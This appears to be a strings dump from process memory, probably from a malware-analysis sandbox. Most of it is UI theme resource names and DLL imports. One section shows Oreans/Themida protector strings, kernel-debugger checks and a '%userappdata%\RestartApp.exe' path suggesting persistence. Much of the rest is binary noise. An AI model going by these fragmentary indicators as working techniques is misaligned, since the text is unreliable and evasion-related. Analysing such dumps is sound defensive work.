OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_TAB&BLUE_IDB_OFFICE2007_RIBBON_KEYTIP_BACK'BLUE_IDB_OFFICE2007_RIBBON_PANEL_BACK_B'BLUE_IDB_OFFICE2007_RIBBON_PANEL_BACK_T%BLUE_IDB_OFFICE2007_RIBBON_PANEL_MAIN,BLUE_IDB_OFFICE2007_RIBBON_PANEL_MAIN_BORDER$BLUE_IDB_OFFICE2007_RIBBON_PANEL_QAT*BLUE_IDB_OFFICE2007_RIBBON_PANEL_SEPARATOR(BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_BACK,BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY*BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL.BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT BLUE_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS*BLUE_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS'BLUE_IDB_OFFICE2007_RIBBON_SLIDER_THUMB"BLUE_IDB_OFFICE2007_STATUSBAR_BACK&BLUE_IDB_OFFICE2007_STATUSBAR_BACK_EXT(BLUE_IDB_OFFICE2007_STATUSBAR_PANEBORDER%BLUE_IDB_OFFICE2007_STATUSBAR_SIZEBOX BLUE_IDB_OFFICE2007_SYS_BTN_BACK"BLUE_IDB_OFFICE2007_SYS_BTN_BACK_S!BLUE_IDB_OFFICE2007_SYS_BTN_CLOSE#BLUE_IDB_OFFICE2007_SYS_BTN_CLOSE_S$BLUE_IDB_OFFICE2007_SYS_BTN_MAXIMIZE&BLUE_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S$BLUE_IDB_OFFICE2007_SYS_BTN_MINIMIZE&BLUE_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S#BLUE_IDB_OFFICE2007_SYS_BTN_RESTORE%BLUE_IDB_OFFICE2007_SYS_BTN_RESTORE_S
SILVER_IDB_OFFICE2007_MENU_BTN'SILVER_IDB_OFFICE2007_MENU_BTN_DISABLED'SILVER_IDB_OFFICE2007_MENU_BTN_SCROLL_T-SILVER_IDB_OFFICE2007_MENU_BTN_VERT_SEPARATOR$SILVER_IDB_OFFICE2007_MENU_ITEM_BACK(SILVER_IDB_OFFICE2007_MENU_ITEM_MARKER_C(SILVER_IDB_OFFICE2007_MENU_ITEM_MARKER_R&SILVER_IDB_OFFICE2007_OUTLOOK_BAR_BACK&SILVER_IDB_OFFICE2007_OUTLOOK_BTN_PAGE&SILVER_IDB_OFFICE2007_POPUPMENU_BORDER)SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR1SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HV2SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HVT0SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_V*SILVER_IDB_OFFICE2007_RIBBON_BORDER_FLOATY'SILVER_IDB_OFFICE2007_RIBBON_BORDER_QAT&SILVER_IDB_OFFICE2007_RIBBON_BTN_CHECK(SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT-SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_ICON.SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_IMAGE,SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT1SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT_ICON.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_C.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_M.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_C.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_M.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_C.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_M(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_F(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_L(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_M(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_S'SILVER_IDB_OFFICE2007_RIBBON_BTN_LAUNCH,SILVER_IDB_OFFICE2007_RIBBON_BTN_LAUNCH_ICON%SILVER_IDB_OFFICE2007_RIBBON_BTN_MAIN)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_H_C)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_H_M)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_V_C)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_V_M)SILVER_IDB_OFFICE2007_RIBBON_BTN_NORMAL_B)SILVER_IDB_OFFICE2007_RIBBON_BTN_NORMAL_S'SILVER_IDB_OFFICE2007_RIBBON_BTN_PAGE_L'SILVER_IDB_OFFICE2007_RIBBON_BTN_PAGE_R*SILVER_IDB_OFFICE2007_RIBBON_BTN_PALETTE_B*SILVER_IDB_OFFICE2007_RIBBON_BTN_PALETTE_M*SILVER_IDB_OFFICE2007_RIBBON_BTN_PALETTE_T SILVER_IDB_OFFICE2007_RIBBON_BTN_PANEL_MAIN,SILVER_IDB_OFFICE2007_RIBBON_BTN_STATUS_PANE'SILVER_IDB_OFFICE2007_RIBBON_CAPTION_QA-SILVER_IDB_OFFICE2007_RIBBON_CAPTION_QA_GLASS*SILVER_IDB_OFFICE2007_RIBBON_CATEGORY_BACK)SILVER_IDB_OFFICE2007_RIBBON_CATEGORY_TAB-SILVER_IDB_OFFICE2007_RIBBON_CATEGORY_TAB_SEP2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_TAB1SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_B1SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_T2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_TAB.SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_SEPARATOR2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_TAB(SILVER_IDB_OFFICE2007_RIBBON_KEYTIP_BACK)SILVER_IDB_OFFICE2007_RIBBON_PANEL_BACK_B)SILVER_IDB_OFFICE2007_RIBBON_PANEL_BACK_T'SILVER_IDB_OFFICE2007_RIBBON_PANEL_MAIN.SILVER_IDB_OFFICE2007_RIBBON_PANEL_MAIN_BORDER&SILVER_IDB_OFFICE2007_RIBBON_PANEL_QAT,SILVER_IDB_OFFICE2007_RIBBON_PANEL_SEPARATOR*SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_BACK.SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY,SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL0SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT-SILVER_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS,SILVER_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS)SILVER_IDB_OFFICE2007_RIBBON_SLIDER_THUMB$SILVER_IDB_OFFICE2007_STATUSBAR_BACK(SILVER_IDB_OFFICE2007_STATUSBAR_BACK_EXT*SILVER_IDB_OFFICE2007_STATUSBAR_PANEBORDER'SILVER_IDB_OFFICE2007_STATUSBAR_SIZEBOX"SILVER_IDB_OFFICE2007_SYS_BTN_BACK$SILVER_IDB_OFFICE2007_SYS_BTN_BACK_S#SILVER_IDB_OFFICE2007_SYS_BTN_CLOSE%SILVER_IDB_OFFICE2007_SYS_BTN_CLOSE_S&SILVER_IDB_OFFICE2007_SYS_BTN_MAXIMIZE(SILVER_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S&SILVER_IDB_OFFICE2007_SYS_BTN_MINIMIZE(SILVER_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S%SILVER_IDB_OFFICE2007_SYS_BTN_RESTORE'SILVER_IDB_OFFICE2007_SYS_BTN_RESTORE_S
WINDOWS7_IDB_COMBOBOX_BTN
WINDOWS7_IDB_MENU_BTN
WINDOWS7_IDB_MENU_BTN_DISABLED
WINDOWS7_IDB_MENU_ITEM_BACK
WINDOWS7_IDB_MENU_ITEM_MARKER_C
WINDOWS7_IDB_MENU_ITEM_MARKER_R WINDOWS7_IDB_RIBBON_BORDER_PANEL
WINDOWS7_IDB_RIBBON_BORDER_QAT
WINDOWS7_IDB_RIBBON_BTN_DEFAULT$WINDOWS7_IDB_RIBBON_BTN_DEFAULT_ICON%WINDOWS7_IDB_RIBBON_BTN_DEFAULT_IMAGE#WINDOWS7_IDB_RIBBON_BTN_DEFAULT_QAT%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_F_C%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_F_M%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_L_C%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_L_M%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_M_C%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_M_M
WINDOWS7_IDB_RIBBON_BTN_GROUP_F
WINDOWS7_IDB_RIBBON_BTN_GROUP_L
WINDOWS7_IDB_RIBBON_BTN_GROUP_M
WINDOWS7_IDB_RIBBON_BTN_GROUP_S
WINDOWS7_IDB_RIBBON_BTN_LAUNCH#WINDOWS7_IDB_RIBBON_BTN_LAUNCH_ICON
WINDOWS7_IDB_RIBBON_BTN_MAIN WINDOWS7_IDB_RIBBON_BTN_MENU_H_C WINDOWS7_IDB_RIBBON_BTN_MENU_H_M WINDOWS7_IDB_RIBBON_BTN_MENU_V_C WINDOWS7_IDB_RIBBON_BTN_MENU_V_M WINDOWS7_IDB_RIBBON_BTN_NORMAL_B WINDOWS7_IDB_RIBBON_BTN_NORMAL_S
WINDOWS7_IDB_RIBBON_BTN_PAGE_L
WINDOWS7_IDB_RIBBON_BTN_PAGE_R!WINDOWS7_IDB_RIBBON_BTN_PALETTE_B!WINDOWS7_IDB_RIBBON_BTN_PALETTE_M!WINDOWS7_IDB_RIBBON_BTN_PALETTE_T#WINDOWS7_IDB_RIBBON_BTN_STATUS_PANE
WINDOWS7_IDB_RIBBON_CAPTION_QA!WINDOWS7_IDB_RIBBON_CATEGORY_BACK WINDOWS7_IDB_RIBBON_CATEGORY_TAB$WINDOWS7_IDB_RIBBON_CATEGORY_TAB_SEP WINDOWS7_IDB_RIBBON_CONTEXT_B_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_B_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_B_CATEGORY_TAB WINDOWS7_IDB_RIBBON_CONTEXT_G_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_G_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_G_CATEGORY_TAB WINDOWS7_IDB_RIBBON_CONTEXT_I_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_I_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_I_CATEGORY_TAB WINDOWS7_IDB_RIBBON_CONTEXT_O_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_O_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_O_CATEGORY_TAB WINDOWS7_IDB_RIBBON_CONTEXT_R_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_R_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_R_CATEGORY_TAB%WINDOWS7_IDB_RIBBON_CONTEXT_SEPARATOR WINDOWS7_IDB_RIBBON_CONTEXT_V_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_V_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_V_CATEGORY_TAB WINDOWS7_IDB_RIBBON_CONTEXT_Y_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_Y_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_Y_CATEGORY_TAB
WINDOWS7_IDB_RIBBON_PANEL_BACK"WINDOWS7_IDB_RIBBON_PANEL_BACK_SEP
WINDOWS7_IDB_RIBBON_PANEL_MAIN$WINDOWS7_IDB_RIBBON_SLIDER_BTN_MINUS#WINDOWS7_IDB_RIBBON_SLIDER_BTN_PLUS
WINDOWS7_IDX_STYLE
12.0.21005.1 built by: REL
devenv.exe
12.0.21005.1
Photoshop.exe
1.0.0.1
BrowserAdvance.exe

%original file name%.exe_4032_rwx_10001000_00033000:

f9z.vk
@Microsoft.XMLDOM
dwmapi.dll
Riched20.dll
Riched32.dll
{00000000-0000-0000-C000-000000000046}
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
kernel32.dll
ole32.dll
gdiplus.dll
GdiPlus.dll
gdi32.dll
user32.dll
Advapi32.dll
advapi32.dll
User32.dll
ntdll.dll
Ole32.dll
shell32.dll
atl.dll
program internal error number is %d.
:"%s"
:"%s".
GetProcessHeap
&..0`%X
.text
`.rdata
@.data
.rsrc
.reloc

sesvcs_963_56089.exe_2324_rwx_0142F000_00216000:

C:\Windows\system32\ntdll.dll
%userappdata%\RestartApp.exe
34$14$34$
4$\3,$1,$3,$
Exit Status = %d
3,$1,$3,$
]34$14$34$
3<$1<$3<$
_34$14$34$\
.gh2%
7?.bp
3<$1<$3<$\
USER32.dll
ADVAPI32.dll
NTDLL.dll
34$14$34$\
\\.\SICE
\\.\SIWVID
\\.\NTICE
3Cannot write oreans.vxd
\Oreans.vxd
ADVAPI32.DLL
oreans32.sys
oreansx64.sys
\\.\oreans32
\\.\Global\oreans32
\\.\Global\oreansx64
%s\system32\drivers\%s
%s\syswow64\drivers\%s
%s\system32\drivers\oreans32.sys
3Cannot Update oreans.sys driver. Please, make sure that you have
3Cannot open oreans.vxd driver. Make sure that oreans.vxd
\\.\Oreans.vxd
%s\Oreans.vxd
contact info@oreans.com for this error
winmm.dll
\34$14$34$
CheckIN = %d
CheckOUT = %d
ProcIN = %d
ProcOUT = %d
ExitIN = %d
ExitOUT = %d
TPin = %d
HWIn = %d
IntV = %x, %x, %x, %x
3,$1,$3,$\
.hg>N
L>.Zk
.aitR
3An internal exception occurred (Address: 0x%x)
Please, contact yoursite@yoursite.com. Thank you!
[.FlFz
$\34$14$34$
yProcess Monitor - test.pml
1<$3<$1<$
<9.EXEu
Rd[)Ò
Rdl)Ò
.gRrH
%%uHs
!.tI*
]P5A
D.IeD.
?.cs?
?.tn?.
.: .`#7.
$/.`#/.!=
/`# .`#7.
j.NZ ..
.ii1.
$ .Gs
.Btj.=F
3?.`# .`#7.
_# .`#7.
U@.wd>=
].XWJ~p
N.MQ5
6.Aj6\A
I.NZK
6jD?MfN.JUG
ULS3.Fs3
A%UBE<P
WEBPP
D.PiE~V#BSP;E
BqW%C
ER0QFQ3%F^3
3.Gc9kA 5
HoL.HWNJK
BoV.BWPJE
P^i_.th
s%dsh@:/i
.tH7C
*aC=.qq
O.Hac\
p.xli
p.xliv
&).Bg
p.Tml
,--D}
.conf
%userap
ZO.De
AQUA_IDB_OFFICE2007_MENU_BTN%AQUA_IDB_OFFICE2007_MENU_BTN_DISABLED%AQUA_IDB_OFFICE2007_MENU_BTN_SCROLL_T"AQUA_IDB_OFFICE2007_MENU_ITEM_BACK&AQUA_IDB_OFFICE2007_MENU_ITEM_MARKER_C&AQUA_IDB_OFFICE2007_MENU_ITEM_MARKER_R$AQUA_IDB_OFFICE2007_POPUPMENU_BORDER'AQUA_IDB_OFFICE2007_POPUPMENU_RESIZEBAR/AQUA_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HV0AQUA_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HVT.AQUA_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_V(AQUA_IDB_OFFICE2007_RIBBON_BORDER_FLOATY$AQUA_IDB_OFFICE2007_RIBBON_BTN_CHECK&AQUA_IDB_OFFICE2007_RIBBON_BTN_DEFAULT,AQUA_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_IMAGE*AQUA_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT/AQUA_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT_ICON,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_C,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_M,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_C,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_M,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_C,AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_M&AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUP_F&AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUP_L&AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUP_M&AQUA_IDB_OFFICE2007_RIBBON_BTN_GROUP_S*AQUA_IDB_OFFICE2007_RIBBON_BTN_LAUNCH_ICON#AQUA_IDB_OFFICE2007_RIBBON_BTN_MAIN'AQUA_IDB_OFFICE2007_RIBBON_BTN_MENU_H_C'AQUA_IDB_OFFICE2007_RIBBON_BTN_MENU_H_M'AQUA_IDB_OFFICE2007_RIBBON_BTN_MENU_V_C'AQUA_IDB_OFFICE2007_RIBBON_BTN_MENU_V_M'AQUA_IDB_OFFICE2007_RIBBON_BTN_NORMAL_B'AQUA_IDB_OFFICE2007_RIBBON_BTN_NORMAL_S%AQUA_IDB_OFFICE2007_RIBBON_BTN_PAGE_L%AQUA_IDB_OFFICE2007_RIBBON_BTN_PAGE_R(AQUA_IDB_OFFICE2007_RIBBON_BTN_PALETTE_B(AQUA_IDB_OFFICE2007_RIBBON_BTN_PALETTE_M(AQUA_IDB_OFFICE2007_RIBBON_BTN_PALETTE_T)AQUA_IDB_OFFICE2007_RIBBON_BTN_PANEL_MAIN*AQUA_IDB_OFFICE2007_RIBBON_BTN_STATUS_PANE%AQUA_IDB_OFFICE2007_RIBBON_CAPTION_QA AQUA_IDB_OFFICE2007_RIBBON_CAPTION_QA_GLASS(AQUA_IDB_OFFICE2007_RIBBON_CATEGORY_BACK'AQUA_IDB_OFFICE2007_RIBBON_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_B_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_G_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_I_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_O_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_TAB/AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_B/AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_T0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_R_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_TAB,AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_SEPARATOR0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_V_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_TAB0AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_Y_BTN_DEFAULT2AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_BACK5AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_CAPTION1AQUA_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_TAB&AQUA_IDB_OFFICE2007_RIBBON_KEYTIP_BACK'AQUA_IDB_OFFICE2007_RIBBON_PANEL_BACK_B'AQUA_IDB_OFFICE2007_RIBBON_PANEL_BACK_T*AQUA_IDB_OFFICE2007_RIBBON_PANEL_SEPARATOR(AQUA_IDB_OFFICE2007_RIBBON_PROGRESS_BACK,AQUA_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY*AQUA_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL.AQUA_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT AQUA_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS*AQUA_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS'AQUA_IDB_OFFICE2007_RIBBON_SLIDER_THUMB"AQUA_IDB_OFFICE2007_STATUSBAR_BACK&AQUA_IDB_OFFICE2007_STATUSBAR_BACK_EXT(AQUA_IDB_OFFICE2007_STATUSBAR_PANEBORDER%AQUA_IDB_OFFICE2007_STATUSBAR_SIZEBOX AQUA_IDB_OFFICE2007_SYS_BTN_BACK"AQUA_IDB_OFFICE2007_SYS_BTN_BACK_S!AQUA_IDB_OFFICE2007_SYS_BTN_CLOSE#AQUA_IDB_OFFICE2007_SYS_BTN_CLOSE_S$AQUA_IDB_OFFICE2007_SYS_BTN_MAXIMIZE&AQUA_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S$AQUA_IDB_OFFICE2007_SYS_BTN_MINIMIZE&AQUA_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S#AQUA_IDB_OFFICE2007_SYS_BTN_RESTORE%AQUA_IDB_OFFICE2007_SYS_BTN_RESTORE_S
BLACK_IDB_OFFICE2007_MENU_BTN&BLACK_IDB_OFFICE2007_MENU_BTN_DISABLED&BLACK_IDB_OFFICE2007_MENU_BTN_SCROLL_T,BLACK_IDB_OFFICE2007_MENU_BTN_VERT_SEPARATOR#BLACK_IDB_OFFICE2007_MENU_ITEM_BACK'BLACK_IDB_OFFICE2007_MENU_ITEM_MARKER_C'BLACK_IDB_OFFICE2007_MENU_ITEM_MARKER_R%BLACK_IDB_OFFICE2007_OUTLOOK_BAR_BACK%BLACK_IDB_OFFICE2007_OUTLOOK_BTN_PAGE%BLACK_IDB_OFFICE2007_POPUPMENU_BORDER(BLACK_IDB_OFFICE2007_POPUPMENU_RESIZEBAR0BLACK_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HV1BLACK_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HVT/BLACK_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_V)BLACK_IDB_OFFICE2007_RIBBON_BORDER_FLOATY&BLACK_IDB_OFFICE2007_RIBBON_BORDER_QAT%BLACK_IDB_OFFICE2007_RIBBON_BTN_CHECK'BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT,BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_ICON-BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_IMAGE BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT0BLACK_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT_ICON-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_C-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_M-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_C-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_M-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_C-BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_M'BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUP_F'BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUP_L'BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUP_M'BLACK_IDB_OFFICE2007_RIBBON_BTN_GROUP_S&BLACK_IDB_OFFICE2007_RIBBON_BTN_LAUNCH BLACK_IDB_OFFICE2007_RIBBON_BTN_LAUNCH_ICON$BLACK_IDB_OFFICE2007_RIBBON_BTN_MAIN(BLACK_IDB_OFFICE2007_RIBBON_BTN_MENU_H_C(BLACK_IDB_OFFICE2007_RIBBON_BTN_MENU_H_M(BLACK_IDB_OFFICE2007_RIBBON_BTN_MENU_V_C(BLACK_IDB_OFFICE2007_RIBBON_BTN_MENU_V_M(BLACK_IDB_OFFICE2007_RIBBON_BTN_NORMAL_B(BLACK_IDB_OFFICE2007_RIBBON_BTN_NORMAL_S&BLACK_IDB_OFFICE2007_RIBBON_BTN_PAGE_L&BLACK_IDB_OFFICE2007_RIBBON_BTN_PAGE_R)BLACK_IDB_OFFICE2007_RIBBON_BTN_PALETTE_B)BLACK_IDB_OFFICE2007_RIBBON_BTN_PALETTE_M)BLACK_IDB_OFFICE2007_RIBBON_BTN_PALETTE_T*BLACK_IDB_OFFICE2007_RIBBON_BTN_PANEL_MAIN BLACK_IDB_OFFICE2007_RIBBON_BTN_STATUS_PANE&BLACK_IDB_OFFICE2007_RIBBON_CAPTION_QA,BLACK_IDB_OFFICE2007_RIBBON_CAPTION_QA_GLASS)BLACK_IDB_OFFICE2007_RIBBON_CATEGORY_BACK(BLACK_IDB_OFFICE2007_RIBBON_CATEGORY_TAB,BLACK_IDB_OFFICE2007_RIBBON_CATEGORY_TAB_SEP1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_B_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_TAB1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_G_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_TAB1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_I_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RI